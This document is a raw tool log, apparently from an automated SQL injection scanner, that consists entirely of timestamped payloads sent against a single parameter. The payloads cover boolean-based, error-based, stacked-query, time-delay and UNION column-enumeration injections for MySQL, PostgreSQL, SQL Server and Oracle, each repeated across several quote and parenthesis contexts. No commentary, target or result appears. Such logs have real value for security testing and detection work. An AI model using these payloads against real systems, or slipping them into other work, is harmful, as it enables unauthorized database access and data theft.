[17:56:52] [PAYLOAD] 6787
[17:56:52] [PAYLOAD] 5845
[17:56:53] [PAYLOAD] 1")))(,,)')
[17:56:53] [PAYLOAD] 5433-5432
[17:56:54] [PAYLOAD] 1.8ChSI
[17:56:55] [PAYLOAD] 1'NKZqCS<'">bIRAbA
[17:56:55] [PAYLOAD] 1) AND 5836=4675 AND (5312=5312
[17:56:57] [PAYLOAD] 1) AND 3611=3611 AND (5554=5554
[17:56:57] [PAYLOAD] 1 AND 3050=5102
[17:56:58] [PAYLOAD] 1 AND 3611=3611
[17:56:58] [PAYLOAD] 1 AND 2076=1452-- zXSW
[17:56:59] [PAYLOAD] 1 AND 3611=3611-- SJqY
[17:57:00] [PAYLOAD] 1') AND 7457=2191 AND ('iHjE'='iHjE
[17:57:00] [PAYLOAD] 1') AND 3611=3611 AND ('xpHU'='xpHU
[17:57:01] [PAYLOAD] 1' AND 7019=2399 AND 'bmfB'='bmfB
[17:57:02] [PAYLOAD] 1' AND 3611=3611 AND 'oygD'='oygD
[17:57:02] [PAYLOAD] 1%' AND 2404=6511 AND '%'='
[17:57:03] [PAYLOAD] 1%' AND 3611=3611 AND '%'='
[17:57:03] [PAYLOAD] (SELECT (CASE WHEN (9362=8798) THEN 9362 ELSE 9362*(SELECT 9362 FROM INFORMATION_SCHEMA.PLUGINS) END))
[17:57:04] [PAYLOAD] (SELECT (CASE WHEN (3684=3684) THEN 3684 ELSE 3684*(SELECT 3684 FROM INFORMATION_SCHEMA.PLUGINS) END))
[17:57:05] [PAYLOAD] 1) AND (SELECT 9697 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT (ELT(9697=9697,1))),0x7171717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (6121=6121
[17:57:05] [PAYLOAD] 1 AND (SELECT 9697 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT (ELT(9697=9697,1))),0x7171717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
[17:57:06] [PAYLOAD] 1 AND (SELECT 9697 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT (ELT(9697=9697,1))),0x7171717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NonP
[17:57:06] [PAYLOAD] 1') AND (SELECT 9697 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT (ELT(9697=9697,1))),0x7171717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('DVsm'='DVsm
[17:57:07] [PAYLOAD] 1' AND (SELECT 9697 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT (ELT(9697=9697,1))),0x7171717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'JKvn'='JKvn
[17:57:08] [PAYLOAD] 1%' AND (SELECT 9697 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT (ELT(9697=9697,1))),0x7171717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND '%'='
[17:57:08] [PAYLOAD] 1) AND 7622=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (7622=7622) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(113)||CHR(120)||CHR(113)) AS NUMERIC) AND (9963=9963
[17:57:09] [PAYLOAD] 1 AND 7622=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (7622=7622) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(113)||CHR(120)||CHR(113)) AS NUMERIC)
[17:57:09] [PAYLOAD] 1 AND 7622=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (7622=7622) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(113)||CHR(120)||CHR(113)) AS NUMERIC)-- VWJB
[17:57:10] [PAYLOAD] 1') AND 7622=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (7622=7622) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(113)||CHR(120)||CHR(113)) AS NUMERIC) AND ('JGjZ'='JGjZ
[17:57:11] [PAYLOAD] 1' AND 7622=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (7622=7622) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(113)||CHR(120)||CHR(113)) AS NUMERIC) AND 'VCNg'='VCNg
[17:57:11] [PAYLOAD] 1%' AND 7622=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (7622=7622) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(113)||CHR(120)||CHR(113)) AS NUMERIC) AND '%'='
[17:57:12] [PAYLOAD] 1) AND 9533 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (9533=9533) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(113))) AND (1264=1264
[17:57:13] [PAYLOAD] 1 AND 9533 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (9533=9533) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(113)))
[17:57:13] [PAYLOAD] 1 AND 9533 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (9533=9533) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(113)))-- sFCM
[17:57:14] [PAYLOAD] 1') AND 9533 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (9533=9533) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(113))) AND ('eWKx'='eWKx
[17:57:14] [PAYLOAD] 1' AND 9533 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (9533=9533) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(113))) AND 'zLoF'='zLoF
[17:57:15] [PAYLOAD] 1%' AND 9533 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (9533=9533) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(113))) AND '%'='
[17:57:16] [PAYLOAD] 1) AND 4249=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (4249=4249) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(113)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) AND (9475=9475
[17:57:16] [PAYLOAD] 1 AND 4249=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (4249=4249) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(113)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL)
[17:57:17] [PAYLOAD] 1 AND 4249=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (4249=4249) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(113)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL)-- bfCW
[17:57:18] [PAYLOAD] 1') AND 4249=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (4249=4249) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(113)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) AND ('mQhu'='mQhu
[17:57:18] [PAYLOAD] 1' AND 4249=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (4249=4249) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(113)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) AND 'MGRK'='MGRK
[17:57:19] [PAYLOAD] 1%' AND 4249=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (4249=4249) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(113)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='
[17:57:19] [PAYLOAD] (SELECT 8610 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT (ELT(8610=8610,1))),0x7171717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
[17:57:20] [PAYLOAD] (SELECT CONCAT(0x71766a6271,(SELECT (ELT(3360=3360,1))),0x7171717871))
[17:57:21] [PAYLOAD] (SELECT (CHR(113)||CHR(118)||CHR(106)||CHR(98)||CHR(113))||(SELECT (CASE WHEN (2394=2394) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(113)||CHR(120)||CHR(113)))
[17:57:21] [PAYLOAD] (SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (5838=5838) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(113)+CHAR(120)+CHAR(113))
[17:57:22] [PAYLOAD] 1);SELECT PG_SLEEP(5)--
[17:57:22] [PAYLOAD] 1;SELECT PG_SLEEP(5)--
[17:57:23] [PAYLOAD] 1');SELECT PG_SLEEP(5)--
[17:57:24] [PAYLOAD] 1';SELECT PG_SLEEP(5)--
[17:57:24] [PAYLOAD] 1%';SELECT PG_SLEEP(5)--
[17:57:25] [PAYLOAD] 1);WAITFOR DELAY '0:0:5'--
[17:57:25] [PAYLOAD] 1;WAITFOR DELAY '0:0:5'--
[17:57:26] [PAYLOAD] 1');WAITFOR DELAY '0:0:5'--
[17:57:27] [PAYLOAD] 1';WAITFOR DELAY '0:0:5'--
[17:57:27] [PAYLOAD] 1%';WAITFOR DELAY '0:0:5'--
[17:57:28] [PAYLOAD] 1);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(84)||CHR(106)||CHR(102)||CHR(83),5) FROM DUAL--
[17:57:28] [PAYLOAD] 1;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(84)||CHR(106)||CHR(102)||CHR(83),5) FROM DUAL--
[17:57:29] [PAYLOAD] 1');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(84)||CHR(106)||CHR(102)||CHR(83),5) FROM DUAL--
[17:57:30] [PAYLOAD] 1';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(84)||CHR(106)||CHR(102)||CHR(83),5) FROM DUAL--
[17:57:30] [PAYLOAD] 1%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(84)||CHR(106)||CHR(102)||CHR(83),5) FROM DUAL--
[17:57:31] [PAYLOAD] 1) AND SLEEP(5) AND (7824=7824
[17:57:31] [PAYLOAD] 1 AND SLEEP(5)
[17:57:32] [PAYLOAD] 1 AND SLEEP(5)-- THvg
[17:57:33] [PAYLOAD] 1') AND SLEEP(5) AND ('GJyr'='GJyr
[17:57:33] [PAYLOAD] 1' AND SLEEP(5) AND 'itCe'='itCe
[17:57:34] [PAYLOAD] 1%' AND SLEEP(5) AND '%'='
[17:57:34] [PAYLOAD] 1) AND 6592=(SELECT 6592 FROM PG_SLEEP(5)) AND (2513=2513
[17:57:35] [PAYLOAD] 1 AND 6592=(SELECT 6592 FROM PG_SLEEP(5))
[17:57:36] [PAYLOAD] 1 AND 6592=(SELECT 6592 FROM PG_SLEEP(5))-- Qmvu
[17:57:36] [PAYLOAD] 1') AND 6592=(SELECT 6592 FROM PG_SLEEP(5)) AND ('bARY'='bARY
[17:57:37] [PAYLOAD] 1' AND 6592=(SELECT 6592 FROM PG_SLEEP(5)) AND 'NYPb'='NYPb
[17:57:37] [PAYLOAD] 1%' AND 6592=(SELECT 6592 FROM PG_SLEEP(5)) AND '%'='
[17:57:38] [PAYLOAD] 1) WAITFOR DELAY '0:0:5' AND (5754=5754
[17:57:39] [PAYLOAD] 1 WAITFOR DELAY '0:0:5'
[17:57:39] [PAYLOAD] 1 WAITFOR DELAY '0:0:5'-- akjU
[17:57:40] [PAYLOAD] 1') WAITFOR DELAY '0:0:5' AND ('RIHg'='RIHg
[17:57:41] [PAYLOAD] 1' WAITFOR DELAY '0:0:5' AND 'cIcm'='cIcm
[17:57:41] [PAYLOAD] 1%' WAITFOR DELAY '0:0:5' AND '%'='
[17:57:42] [PAYLOAD] 1) AND 9940=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(111)||CHR(115)||CHR(104),5) AND (4586=4586
[17:57:42] [PAYLOAD] 1 AND 9940=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(111)||CHR(115)||CHR(104),5)
[17:57:43] [PAYLOAD] 1 AND 9940=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(111)||CHR(115)||CHR(104),5)-- jIbI
[17:57:44] [PAYLOAD] 1') AND 9940=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(111)||CHR(115)||CHR(104),5) AND ('VgiB'='VgiB
[17:57:44] [PAYLOAD] 1' AND 9940=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(111)||CHR(115)||CHR(104),5) AND 'BOxx'='BOxx
[17:57:45] [PAYLOAD] 1%' AND 9940=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(111)||CHR(115)||CHR(104),5) AND '%'='
[17:57:45] [PAYLOAD] 1) ORDER BY 1-- zRhc
[17:57:46] [PAYLOAD] 1) ORDER BY 4287-- vRlT
[17:57:47] [PAYLOAD] 1) UNION ALL SELECT NULL-- fqfI
[17:57:47] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL-- EXrh
[17:57:48] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL-- fqpX
[17:57:49] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL-- zhRN
[17:57:49] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- pgqv
[17:57:50] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- NXUF
[17:57:51] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- uqAC
[17:57:51] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- DxvE
[17:57:52] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Cgcm
[17:57:52] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- CEEX
[17:57:53] [PAYLOAD] 1 ORDER BY 1-- kzEn
[17:57:54] [PAYLOAD] 1 ORDER BY 4721-- gPsZ
[17:57:54] [PAYLOAD] 1 UNION ALL SELECT NULL-- uRNf
[17:57:55] [PAYLOAD] 1 UNION ALL SELECT NULL,NULL-- ctvb
[17:57:56] [PAYLOAD] 1 UNION ALL SELECT NULL,NULL,NULL-- TLHU
[17:57:56] [PAYLOAD] 1 UNION ALL SELECT NULL,NULL,NULL,NULL-- fKpc
[17:57:57] [PAYLOAD] 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- bDCI
[17:57:57] [PAYLOAD] 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ntmA
[17:57:58] [PAYLOAD] 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- sBcc
[17:57:59] [PAYLOAD] 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- IKMj
[17:57:59] [PAYLOAD] 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- hrdu
[17:58:00] [PAYLOAD] 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- zDon
[17:58:01] [PAYLOAD] 1 ORDER BY 1-- lAea
[17:58:01] [PAYLOAD] 1 ORDER BY 1715-- vHUQ
[17:58:02] [PAYLOAD] 1 UNION ALL SELECT NULL-- jscU
[17:58:02] [PAYLOAD] 1 UNION ALL SELECT NULL,NULL-- sopn
[17:58:03] [PAYLOAD] 1 UNION ALL SELECT NULL,NULL,NULL-- lXro
[17:58:04] [PAYLOAD] 1 UNION ALL SELECT NULL,NULL,NULL,NULL-- WGMa
[17:58:04] [PAYLOAD] 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- rjiF
[17:58:05] [PAYLOAD] 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- qwPK
[17:58:06] [PAYLOAD] 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- gXRN
[17:58:06] [PAYLOAD] 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- wXih
[17:58:07] [PAYLOAD] 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- aPje
[17:58:07] [PAYLOAD] 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- itKr
[17:58:08] [PAYLOAD] 1') ORDER BY 1-- tslS
[17:58:09] [PAYLOAD] 1') ORDER BY 4722-- epns
[17:58:09] [PAYLOAD] 1') UNION ALL SELECT NULL-- eEGL
[17:58:10] [PAYLOAD] 1') UNION ALL SELECT NULL,NULL-- utDw
[17:58:11] [PAYLOAD] 1') UNION ALL SELECT NULL,NULL,NULL-- SOSW
[17:58:11] [PAYLOAD] 1') UNION ALL SELECT NULL,NULL,NULL,NULL-- atbf
[17:58:12] [PAYLOAD] 1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- Syfp
[17:58:12] [PAYLOAD] 1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- IshX
[17:58:13] [PAYLOAD] 1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- rekn
[17:58:14] [PAYLOAD] 1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- BMLy
[17:58:14] [PAYLOAD] 1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- fmtt
[17:58:15] [PAYLOAD] 1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- spUE
[17:58:16] [PAYLOAD] 1' ORDER BY 1-- Hgvf
[17:58:16] [PAYLOAD] 1' ORDER BY 6555-- CoTc
[17:58:17] [PAYLOAD] 1' UNION ALL SELECT NULL-- lmXC
[17:58:22] [PAYLOAD] 1' UNION ALL SELECT NULL,NULL-- ViPr
[17:58:23] [PAYLOAD] 1' UNION ALL SELECT NULL,NULL,NULL-- hhTM
[17:58:23] [PAYLOAD] 1' UNION ALL SELECT NULL,NULL,NULL,NULL-- iRLI
[17:58:24] [PAYLOAD] 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- Dvxx
[17:58:25] [PAYLOAD] 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- mqyP
[17:58:26] [PAYLOAD] 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- PViD
[17:58:26] [PAYLOAD] 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- bNBY
[17:58:27] [PAYLOAD] 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- JiPD
[17:58:27] [PAYLOAD] 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- dLhL
[17:58:28] [PAYLOAD] 1%' ORDER BY 1-- KBQw
[17:58:29] [PAYLOAD] 1%' ORDER BY 7815-- mzUV
[17:58:29] [PAYLOAD] 1%' UNION ALL SELECT NULL-- rJyU
[17:58:30] [PAYLOAD] 1%' UNION ALL SELECT NULL,NULL-- DONg
[17:58:31] [PAYLOAD] 1%' UNION ALL SELECT NULL,NULL,NULL-- Lunn
[17:58:31] [PAYLOAD] 1%' UNION ALL SELECT NULL,NULL,NULL,NULL-- vGXN
[17:58:32] [PAYLOAD] 1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- nBvv
[17:58:33] [PAYLOAD] 1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- GgCj
[17:58:33] [PAYLOAD] 1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- rvrn
[17:58:34] [PAYLOAD] 1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- WYnw
[17:58:35] [PAYLOAD] 1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- BuTs
[17:58:35] [PAYLOAD] 1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ApsM
